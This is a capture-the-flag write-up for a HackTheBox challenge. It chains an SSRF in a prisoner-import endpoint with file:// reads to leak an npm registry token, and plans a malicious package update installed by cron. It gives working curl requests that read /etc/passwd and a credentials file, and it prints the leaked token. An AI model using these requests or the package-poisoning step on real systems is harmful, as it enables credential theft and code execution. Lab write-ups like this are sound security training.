$ cat writeup.md…
hackthebox_business_ctf_2024
Task: abuse an SSRF in node-libcurl-backed prisoner import to read local files and steal the private Verdaccio token. Solution: publish a compatible malicious prisoner-db update through a local Host-header proxy, let cron install it, then read the written flag back through file:// SSRF.
One of our crew members has been captured by mutant raiders and is locked away in their heavily fortified prison. During an initial reconnaissance, the crew managed to gain access to the prison's record management system. Your mission: exploit this system to infiltrate the prison's network and disable the defenses for the rescuers.
Although the original challenge was placed under misc, the reliable solve path is best understood as a web + supply-chain challenge: a web SSRF leaks registry credentials, then a private npm package update yields code execution.
The accurate exploitation chain is:
1. POST /api/prisoners/import is an SSRF via node-libcurl.
2. file:// works, so local files are readable.
3. file:///home/node/.npmrc leaks the Verdaccio auth token.
4. With that token, publish a malicious prisoner-db package version to the private registry.
5. A cron job runs npm outdated/update for prisoner-db against localhost:4873 and restarts the app.
6. The malicious update runs /readflag and writes the result to /app/prisoner-repository/FLAG.txt.
7. Read the flag back through file:///app/prisoner-repository/FLAG.txt.

/api/prisoners/import

The application imports prisoner data from a user-supplied URL. The underlying package uses node-libcurl, so this is not just HTTP SSRF: file:// also works.
That makes local file reads trivial:
```bash
curl -s -X POST 'http://TARGET:1337/api/prisoners/import' \
  -H 'Content-Type: application/json' \
  -d '{"url":"file:///etc/passwd"}'
```
The endpoint returns a prisoner id. Fetching that record shows the raw imported content.
The useful target is /home/node/.npmrc:
```bash
curl -s -X POST 'http://TARGET:1337/api/prisoners/import' \
  -H 'Content-Type: application/json' \
  -d '{"url":"file:///home/node/.npmrc"}'
```
The leaked token was:
```
//localhost:4873/:_authToken="MWZlMmI1OTRiZjMwNTJkMjYwNWZhYTE1NGJlNTVjZDQ6OGRjNDBlMDE3YWNhYjViYzEwM2RlOTQzYzg3OWZiN2YwY2EyZGI5ZmMwMGI4ZWViZWVhZmUzZjc0Y2I2MWFiOTZmNWI1OWVhNTg0N2IwZmIwZQ=="
```
This is enough to authenticate to Verdaccio.
...